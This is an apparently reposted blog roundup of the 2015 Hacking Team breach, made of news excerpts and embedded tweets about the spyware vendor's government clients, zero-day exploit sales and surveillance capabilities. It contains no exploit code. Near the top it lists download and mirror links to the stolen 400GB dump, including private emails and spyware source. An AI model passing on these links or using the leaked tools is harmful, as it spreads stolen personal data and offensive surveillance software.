LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2615012028595202594.post-15531346153751144552015-07-13T12:01:00.000+02:002015-07-13T12:01:13.369+02:00Hacking Team Hacked: 400GB Data Dump of Internal Documents/Emails/Source Code from Notorious Spyware Dealer<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
Hacking Team Hacked: 400GB Data Dump of Internal Documents/Emails/Source Code from Notorious Spyware Dealer</h2>
<small>on <strong>July 7, 2015</strong> at <strong>9:07 AM</strong></small>
<br />
<div class="entry">
<a href="https://leaksource.files.wordpress.com/2015/07/hacked-team.jpg"><img alt="hacked-team" class="aligncenter size-full wp-image-28513" height="101" src="https://leaksource.files.wordpress.com/2015/07/hacked-team.jpg?w=604&h=101" width="604" /></a><br />
<em>07/05-09/2015</em><br />
The controversial Italian surveillance company <span style="text-decoration: underline;"><a href="https://en.wikipedia.org/wiki/Hacking_Team" target="_blank">Hacking Team</a></span>, which <a href="https://citizenlab.org/2014/02/mapping-hacking-teams-untraceable-spyware/" target="_blank"><span style="text-decoration: underline;">sells spyware to governments all around the world</span></a>, including agencies in Ethiopia, Morocco, the United Arab Emirates, as well as the <a href="http://motherboard.vice.com/read/the-dea-has-been-secretly-buying-hacking-tools-from-an-italian-company" target="_blank"><span style="text-decoration: underline;">US Drug Enforcement Administration</span></a>, has been seriously hacked.<br />
Hackers have made 400GB of client files, contracts, financial documents, and internal emails, some as recent as 2015, publicly available for download.<br />
What’s more, the unknown hackers <a href="https://archive.is/n0om8" target="_blank"><span style="text-decoration: underline;">announced their feat through Hacking Team’s own Twitter account</span></a>.<br />
<div style="text-align: center;">
<a href="https://leaksource.files.wordpress.com/2015/07/hacked-team.png"><img alt="hacked-team" class="aligncenter size-full wp-image-28509" src="https://leaksource.files.wordpress.com/2015/07/hacked-team.png?w=604" /></a></div>
<div style="text-align: center;">
Torrent Links:<br />
<a href="https://mega.nz/#!Xx1lhChT!rbB-LQQyRypxd5bcQnqu-IMZN20ygW_lWfdHdqpKH3E" target="_blank">https://mega.nz/#!Xx1lhChT!rbB-LQQyRypxd5bcQnqu-IMZN20ygW_lWfdHdqpKH3E</a><br />
<a href="http://infotomb.com/eyyxo.torrent" target="_blank">http://infotomb.com/eyyxo.torrent</a><br />
Mirror:<br />
<a href="https://ht.transparencytoolkit.org/" target="_blank">https://ht.transparencytoolkit.org/</a><br />
Source Codes:<br />
<a href="https://github.com/hackedteam?tab=repositories" target="_blank">https://github.com/hackedteam?tab=repositories</a></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
RELEASE: Over one million searchable emails from spyware contractor <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> <a href="https://t.co/qMYMnmh0ZM">https://t.co/qMYMnmh0ZM</a> <a href="http://t.co/XkiFsOZPVQ">pic.twitter.com/XkiFsOZPVQ</a></div>
— WikiLeaks (@wikileaks) <a href="https://twitter.com/wikileaks/status/619153595494191104">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
Last year, a hacker who only went by the name <span style="text-decoration: underline;"><a href="http://leaksource.info/2014/08/09/hack-back-a-diy-guide-for-those-without-the-patience-to-wait-for-whistleblowers/" target="_blank">“PhineasFisher” hacked</a></span> the controversial surveillance tech company <span style="text-decoration: underline;"><a href="https://en.wikipedia.org/wiki/FinFisher" target="_blank">Gamma International</a></span>, a British-German surveillance company that sells the spyware software FinFisher. He then went on to <a href="http://leaksource.info/2014/08/06/gamma-finfisher-hack-40gb-of-internal-docs-source-code-from-top-govt-spyware-company-leaked/" target="_blank"><span style="text-decoration: underline;">leak more than 40GB of internal data from the company</span></a>, which has been long criticized for selling to repressive governments.<br />
<a href="https://leaksource.files.wordpress.com/2015/07/hacking-team-finfisher-hack.png"><img alt="hacking-team-finfisher-hack" class="aligncenter size-full wp-image-28512" height="517" src="https://leaksource.files.wordpress.com/2015/07/hacking-team-finfisher-hack.png?w=604&h=517" width="604" /></a><br />
<br />
That same hacker has now claimed responsibility for the breach of Hacking Team, that sells a similar product called Remote Controlled System Galileo.<br />
<br />
<div class="embed-vimeo">
<iframe allowfullscreen="" frameborder="0" height="340" mozallowfullscreen="" src="https://player.vimeo.com/video/96913522" title="Dark Secrets - Hacking Team commercial" webkitallowfullscreen="" width="604"></iframe></div>
<br />
<a href="https://twitter.com/lorenzofb" target="_blank">Lorenzo Franceschi-Bicchierai</a>/<a href="http://motherboard.vice.com/read/hacker-claims-responsibility-for-the-hit-on-hacking-team" target="_blank">Motherboard</a>:<br />
On Sunday night, I reached out to the hacker while he was in control of Hacking Team’s Twitter account via a direct message to <span style="text-decoration: underline;"><a href="https://twitter.com/hackingteam" target="_blank">@hackingteam</a></span>. Initially, PhineasFisher responded with sarcasm, saying he was willing to chat because “we got such good publicity from your last story!” referring to a recent <span style="text-decoration: underline;"><a href="http://motherboard.vice.com/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web" target="_blank">story</a></span> I wrote about the company’s CEO claiming to be able to crack the dark web.<br />
Afterwards, however, he also claimed that he was PhineasFisher. To prove it, he told me he would use the parody account he used last year to promote the FinFisher hack to claim responsibility.<br />
“I am the same person behind that hack,” he told me before coming out publicly.<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
gamma and HT down, a few more to go <span class="wp-smiley wp-emoji wp-emoji-smile" title=":)">:)</span></div>
— Phineas Fisher (@GammaGroupPR) <a href="https://twitter.com/GammaGroupPR/status/617937092497178624">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
The hacker, however, declined to answer to any further questions.<br />
The leak of 400GB of internal files contains “everything,” according to a person close to the company, who only spoke on condition of anonymity. The files contain internal emails between employees; a list of customers, including some, such as the FBI, that were previously unknown; and allegedly even the source code of Hacking Team’s software, its crown jewels.<br />
——————————————————————————————————————————————————————————————————-<br />
<strong>HIGHLIGHTS:<br />
</strong><br />
<blockquote class="twitter-tweet">
A few weeks ago Hacking Team's co-founder joked in emails about how bad a leak would be for his company. Oh dear… <a href="http://t.co/AIdOJK3ArG" rel="nofollow">http://t.co/AIdOJK3ArG</a>— <br />
Ryan Gallagher (@rj_gallagher) <a data-datetime="2015-07-06T20:43:50+00:00" href="http://twitter.com/#!/rj_gallagher/status/618158437130702848">July 06, 2015</a></blockquote>
——————————————————————————————————————————————————————————————————-<br />
<div style="text-align: center;">
<iframe frameborder="0" height="453" marginheight="0" marginwidth="0" src="https://docs.google.com/spreadsheets/d/16hcG3kzn5UYXGqpN2iAaSsy6kG85RYDeJNh5V5k8Ydo/pubhtml?widget=true&headers=false" width="604"></iframe><br />
<a href="https://docs.google.com/spreadsheets/d/16hcG3kzn5UYXGqpN2iAaSsy6kG85RYDeJNh5V5k8Ydo/pub?output=xlsx" target="_blank">Download Spreadsheet</a></div>
<div style="text-align: center;">
<iframe frameborder="0" height="453" marginheight="0" marginwidth="0" src="https://docs.google.com/spreadsheets/d/1xBcnB8mPYrDh062XNtSjlPe_t7Agjdjpk_pnpz0sJgc/pubhtml?widget=true&headers=false" width="604"></iframe><br />
<a href="https://docs.google.com/spreadsheets/d/1xBcnB8mPYrDh062XNtSjlPe_t7Agjdjpk_pnpz0sJgc/pub?output=xlsx" target="_blank">Download Spreadsheet</a></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> planning major moves into the United States, pursuing contracts with ATF, DOJ, Navy, RCMP, local police. <a href="http://t.co/owBOLoLfpx">pic.twitter.com/owBOLoLfpx</a></div>
— Collin Anderson (@CDA) <a href="https://twitter.com/CDA/status/618089403681009664">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div style="text-align: center;">
<iframe frameborder="0" height="453" marginheight="0" marginwidth="0" src="https://docs.google.com/spreadsheets/d/1bVKBjNkGp60qjzGYO9n9RGWLb0ZPKQNHfwUXPPpicQs/pubhtml?widget=true&headers=false" width="604"></iframe><br />
<a href="https://docs.google.com/spreadsheets/d/1bVKBjNkGp60qjzGYO9n9RGWLb0ZPKQNHfwUXPPpicQs/pub?output=xlsx" target="_blank">Download Spreadsheet</a></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
So turns out the FBI has spent $775,000 on <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> tools since 2011. My dig in <a href="https://twitter.com/WIRED">@WIRED</a> <a href="http://t.co/DURVelF4fk">http://t.co/DURVelF4fk</a> <a href="http://t.co/1L1lUS9KBY">pic.twitter.com/1L1lUS9KBY</a></div>
— Joseph Cox (@josephfcox) <a href="https://twitter.com/josephfcox/status/618138577357139968">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking team provided FBI with zero-day exploits. <a href="https://t.co/KLlyCNybf5">https://t.co/KLlyCNybf5</a> <a href="http://t.co/IEecyXDeln">pic.twitter.com/IEecyXDeln</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/619192152665538561">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Details on US agencies buying Hacking Teams software: <a href="https://t.co/e8HeHpwUHk">https://t.co/e8HeHpwUHk</a> Code names for FBI and DEA are "Phoebe" and "Katie"</div>
— Cora Currier (@coracurrier) <a href="https://twitter.com/coracurrier/status/618104369079316480">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Very interesting Hacking Team email on US DEA using spy tech "that will receive all the traffic for Columbian ISPs": <a href="http://t.co/HBJG70Ymaj">pic.twitter.com/HBJG70Ymaj</a></div>
— Ryan Gallagher (@rj_gallagher) <a href="https://twitter.com/rj_gallagher/status/618176144106500096">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team, surveillance vendor to FBI, DEA, and U.S. Army (<a href="http://t.co/SuT0z3uzZb">http://t.co/SuT0z3uzZb</a>) made a secret recording of ME <a href="http://t.co/cIlcZodHiU">pic.twitter.com/cIlcZodHiU</a></div>
— Morgan Mayhem (@headhntr) <a href="https://twitter.com/headhntr/status/618209604246175744">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
Screenshot shows an email dated 2014 from Hacking Team’s founder and CEO David Vincenzetti to another employee. In the email, titled “Yet another Citizen Lab attack,” Vincenzetti links to a report from the online digital rights research center Citizen Lab, at the University of Toronto’s Munk School of Global Affairs, which has exposed <a href="https://citizenlab.org/tag/hacking-team/" target="_blank"><span style="text-decoration: underline;">numerous cases</span></a> of abuse from Hacking Team’s clients.<br />
<a href="https://leaksource.files.wordpress.com/2015/07/hacking-team-citizen-lab.png"><img alt="hacking-team-citizen-lab" class="aligncenter size-full wp-image-28511" src="https://leaksource.files.wordpress.com/2015/07/hacking-team-citizen-lab.png?w=604" /></a><br />
Hacking Team has never revealed a list of its clients, and <span style="text-decoration: underline;"><a href="http://t.co/qEW59NdYuy" target="_blank">has always and repeatedly denied</a></span> selling to sketchy governments, arguing that it has an internal procedure to address human rights concerns about prospective customers.<br />
The email about Citizen Lab is filed in a folder called “Anti HT activists.”<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
The activist groups on Hacking Team's enemies list: <a href="http://t.co/AEJnQcA7rM">pic.twitter.com/AEJnQcA7rM</a></div>
— Ryan Gallagher (@rj_gallagher) <a href="https://twitter.com/rj_gallagher/status/618552975095668736">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team CEO on learning WikiLeaks was tracking his mobile phones all over the world: <a href="https://t.co/k7QiDTMD2T">https://t.co/k7QiDTMD2T</a> <a href="http://t.co/QNchvJ2KGM">pic.twitter.com/QNchvJ2KGM</a></div>
— WikiLeaks (@wikileaks) <a href="https://twitter.com/wikileaks/status/619206030501789696">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
I almost feel like this should be my new twitter bio: "this asinine activist looks like a very smart man" <a href="https://t.co/JFiM53HhKw">https://t.co/JFiM53HhKw</a></div>
— Jacob Appelbaum (@ioerror) <a href="https://twitter.com/ioerror/status/619211048080547840">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
My piece on the <a href="https://twitter.com/hackingteam">@hackingteam</a> emails – exposing proposed 'death squad' deal, secret UK sales push, & much more: <a href="https://t.co/shCObgce5L">https://t.co/shCObgce5L</a></div>
— Ryan Gallagher (@rj_gallagher) <a href="https://twitter.com/rj_gallagher/status/618926230813978624">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
"Hacking Team" partnered w/prominent defense contractor to sell UAE spyware used to target activists <a href="http://t.co/UikaoigwJ0">http://t.co/UikaoigwJ0</a></div>
— Lee Fang (@lhfang) <a href="https://twitter.com/lhfang/status/618467089334996992">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> sold spy software to blacklisted <a href="https://twitter.com/hashtag/Sudan?src=hash">#Sudan</a> and 'stonewalled <a href="https://twitter.com/hashtag/UN?src=hash">#UN</a> investigation' <a href="http://t.co/WmM6hU6vxq">http://t.co/WmM6hU6vxq</a></div>
— Gianluca Mezzofiore (@GianlucaMezzo) <a href="https://twitter.com/GianlucaMezzo/status/617967400684793856">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
creepy surveillance company may have violated EU sanctions by selling tech to russia… me+<a href="https://twitter.com/maxseddon">@maxseddon</a> team up at last <a href="http://t.co/GEROUskJQq">http://t.co/GEROUskJQq</a></div>
— Joe Bernstein (@Bernstein) <a href="https://twitter.com/Bernstein/status/618111776358563840">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Congrats to the government of Chile, which in 2014 signed the largest <a href="https://twitter.com/hackingteam">@hackingteam</a> contract to date: 2.85 mil USD. <a href="http://t.co/MuRc6DVecl">pic.twitter.com/MuRc6DVecl</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/617886958774317056">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Who says selling surveillance tech to govs that spy on journalists doesn't pay well? $1 mil from Ethiopia. <a href="http://t.co/I3HCxdl3Gl">pic.twitter.com/I3HCxdl3Gl</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/617879757733134336">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
After <a href="https://twitter.com/citizenlab">@citizenlab</a> and <a href="https://twitter.com/hrw">@hrw</a> outed <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>'s Ethiopia campaign, their provider took down control infrastructure. <a href="http://t.co/bH07Ywe2f0">pic.twitter.com/bH07Ywe2f0</a></div>
— Collin Anderson (@CDA) <a href="https://twitter.com/CDA/status/618239715867820032">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Want to sell surveillance software to Azerbaijan? Best to sell through a shadowy front company in Nevada. <a href="http://t.co/uItb2HoSYn">pic.twitter.com/uItb2HoSYn</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/617997481390047232">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Selling an exploit portal to Egypt in 2012? Seems legit. <a href="http://t.co/XuoqpfeiJC">pic.twitter.com/XuoqpfeiJC</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/617877508403384320">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
For Arab human rights defenders <a href="https://twitter.com/hashtag/hackingteam?src=hash">#hackingteam</a> files confirm suspicions of state surveillance <a href="http://t.co/opHaeuiD5d">http://t.co/opHaeuiD5d</a> My latest for <a href="https://twitter.com/Advox">@Advox</a></div>
— Abir Ghattas (@AbirGhattas) <a href="https://twitter.com/AbirGhattas/status/618835746645012480">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>'s CEO seems to spend hours each week writing emails to their customer list encouraging bombing of Iran. <a href="http://t.co/XF5FrF54jr">pic.twitter.com/XF5FrF54jr</a></div>
— Collin Anderson (@CDA) <a href="https://twitter.com/CDA/status/618372537458774016">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
The Mayor of Quito was one of Hacking Team's Ecuador targets <a href="http://t.co/RZeL0d4HT9">http://t.co/RZeL0d4HT9</a> <a href="https://twitter.com/hashtag/HackingTeamTransparencyReport?src=hash">#HackingTeamTransparencyReport</a></div>
— Bethany Horne (@bbhorne) <a href="https://twitter.com/bbhorne/status/619123863868338177">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
"Not our responsibility to vet clients" says Hacking Team US sales consultant. <a href="http://t.co/8u4hLG1dri">pic.twitter.com/8u4hLG1dri</a></div>
— Eric King (@e3i5) <a href="https://twitter.com/e3i5/status/618122073379086336">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
A detailed look at Hacking Team's emails about clients with dubious human rights records <a href="http://t.co/Hl5LskfMnZ">http://t.co/Hl5LskfMnZ</a> by <a href="https://twitter.com/coracurrier">@coracurrier</a> <a href="https://twitter.com/headhntr">@headhntr</a></div>
— Morgan Mayhem (@headhntr) <a href="https://twitter.com/headhntr/status/618489592795172864">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
SCOOP: Hacking Team demoed its spy software for Calgary, Vancouver Police and Ottawa RCMP: <a href="http://t.co/8liQ3nyPNI">http://t.co/8liQ3nyPNI</a> <a href="https://twitter.com/motherboard">@motherboard</a></div>
— matthew braga (@mattbraga) <a href="https://twitter.com/mattbraga/status/618489154553401345">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Exclusive: German company bought <a href="https://twitter.com/hashtag/spyware?src=hash">#spyware</a> from <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>. Who are their clients? <a href="https://twitter.com/welt">@welt</a> <a href="http://t.co/Sdzhk3aenX">http://t.co/Sdzhk3aenX</a> <a href="http://t.co/P7DRHOOneG">pic.twitter.com/P7DRHOOneG</a></div>
— Florian Flade (@FlorianFlade) <a href="https://twitter.com/FlorianFlade/status/619201601379639297">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
EXCLUSIVE: Irish Defence Forces involved with hacked security company "Hacker Team" <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>
<a href="https://t.co/qXsU0kE3Jh">https://t.co/qXsU0kE3Jh</a></div>
— BeYourOwnReason (@beyourownreason) <a href="https://twitter.com/beyourownreason/status/618079358603931648">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
From the <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> files: big banks worked with the controversial surveillance company <a href="http://t.co/McvUwFCSJo">http://t.co/McvUwFCSJo</a> <a href="http://t.co/OwW19tHqIU">pic.twitter.com/OwW19tHqIU</a></div>
— Joseph Cox (@josephfcox) <a href="https://twitter.com/josephfcox/status/618067121281568768">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="fr">
Microsoft Internet Exploitable <a href="https://t.co/Gi0dzGRqES">https://t.co/Gi0dzGRqES</a></div>
— Matthew Keys (@MatthewKeysLive) <a href="https://twitter.com/MatthewKeysLive/status/619229048393195520">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team leak releases potent Flash 0day into the wild <a href="http://t.co/TcQmgzguTz">http://t.co/TcQmgzguTz</a></div>
— Dan Goodin (@dangoodin001) <a href="https://twitter.com/dangoodin001/status/618481229826932736">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team: Our exploit portal always has at least 3 zero-day exploits, but please try to use non-zero days first. <a href="https://t.co/flJpIR8hkc">https://t.co/flJpIR8hkc</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618084502431121408">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team: Having trouble getting onto a sophisticated target's device? We offer consultancy services too. <a href="http://t.co/oaahc24wET">http://t.co/oaahc24wET</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618085654677860352">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Pro-tip: Don't want <a href="https://twitter.com/hackingteam">@HackingTeam</a>'s clients to spy on you? Don't jailbreak your iPhone. <a href="https://t.co/fJHgICpXPl">https://t.co/fJHgICpXPl</a> <a href="http://t.co/HhrgmDxhI3">pic.twitter.com/HhrgmDxhI3</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618102701025574912">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team's inability to develop iOS malware for non-jailbroken iPhones likely explains why FBI director Comey is foaming at the mouth.</div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618125764970565632">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
via <a href="https://twitter.com/iblametom" target="_blank">Thomas Fox-Brewster</a>/<a href="http://www.forbes.com/sites/thomasbrewster/2015/07/06/us-gov-likes-hacking-team/" target="_blank">Forbes</a>:<br />
<span style="text-decoration: underline;"><a href="http://ht.musalbas.com/rcs-dev%5cshare/QA/Reports/9.6/Android/" target="_blank">In-depth notes on the level of exploitation across a number of Android devices</a></span>, from the likes of Samsung, HTC and Huawei. It appears the exploits weren’t always successful in accessing voice or texts on phones.<br />
Hacking Team operations manager Daniele Milan’s email from January indicated some imminent features in Hacking Team’s tools included “physical infection of BitLocker protected disks”, thereby bypassing the much-used Microsoft disk encryption technology, as well as “extraction of information from pictures posted on Facebook and Twitter”. It will also soon be able to “capture of documents edited using Google Docs or Office 365”, the roadmap suggested.<br />
Another email from Milan, dated 15 May, indicated the security-focused messaging application Wickr was on the target list too, thanks to a request from the US government. “I had a call this morning with an agent from Homeland Security Investigations [a body within the Department of Homeland Security], and he told me he got some requests to intercept suspects using this application, Wickr… we may want to keep an eye on it and eventually evaluate to add support.”<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team's $175,000 Apple Store And Google Play Surveillance Apps Flirt With Illegality <a href="https://twitter.com/Forbes">@Forbes</a> <a href="http://t.co/ZRVzUcUtvA">http://t.co/ZRVzUcUtvA</a></div>
— Thomas Fox-Brewster (@iblametom) <a href="https://twitter.com/iblametom/status/618825782622707713">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/thegrugq">@thegrugq</a> <a href="https://twitter.com/_ejvm">@_ejvm</a> seems that <a href="https://twitter.com/hashtag/hackingteam?src=hash">#hackingteam</a> software is also capable of stealing bitcoins accounts…. <a href="https://twitter.com/hashtag/unacceptable?src=hash">#unacceptable</a> <a href="http://t.co/OQ1ecJkAYh">pic.twitter.com/OQ1ecJkAYh</a></div>
— Aaron Mizrachi (@unmanarc) <a href="https://twitter.com/unmanarc/status/618102286854717440">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
via <a href="https://twitter.com/dangoodin001" target="_blank">Dan Goodin</a>/<a href="http://arstechnica.com/security/2015/07/massive-leak-reveals-hacking-teams-most-private-moments-in-messy-detail/" target="_blank">ArsTechnica</a>:<br />
Another document boasts of Hacking Team’s ability to bypass <span style="text-decoration: underline;"><a href="https://www.imperialviolet.org/2011/05/04/pinning.html" target="_blank">certificate pinning </a></span> and the <span style="text-decoration: underline;"><a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" target="_blank">HTTP strict transport security</a></span> mechanisms that are designed to make HTTPS website encryption more reliable and secure. “Our solution is the only way to intercept TOR traffic at the moment,” the undated PowerPoint presentation went on to say.<br />
Elsewhere, the document stated: “HTTPS Everywhere enforces https and could send rogue certificates to the EFF SSL Observatory.” HTTPS Everywhere is a browser extension developed by the Electronic Frontier Foundation that ensures end users use HTTPS when connecting to a preset list of websites. The statement appears to be a warning that any fraudulent certificates Galileo relies on could become public if used against HTTPS Everywhere users when they have selected an option to <span style="text-decoration: underline;"><a href="https://www.eff.org/deeplinks/2012/02/https-everywhere-decentralized-ssl-observatory" target="_blank">send anonymous copies of HTTPS certificates to EFF’s SSL Observatory database</a></span>.<br />
<iframe frameborder="0" height="389" marginheight="0" marginwidth="0" src="https://docs.google.com/presentation/d/1F9KjaTZKQRMM1eCOpo2TAzXOzIgK_iiYNXDlmw41Iro/embed?start=false&loop=false&delayms=15000" width="480"></iframe>
——————————————————————————————————————————————————————————————————-<br />
Renowned cryptographer <span style="text-decoration: underline;"><a href="https://www.schneier.com/blog/archives/2015/07/hacking_team_is.html" target="_blank">Bruce Schneier</a></span>: “The Hacking Team CEO, David Vincenzetti, <span style="text-decoration: underline;"><a href="http://www.forbes.com/sites/thomasbrewster/2015/07/06/us-gov-likes-hacking-team/" target="_blank">doesn’t like me</a></span>:”<br />
<blockquote>
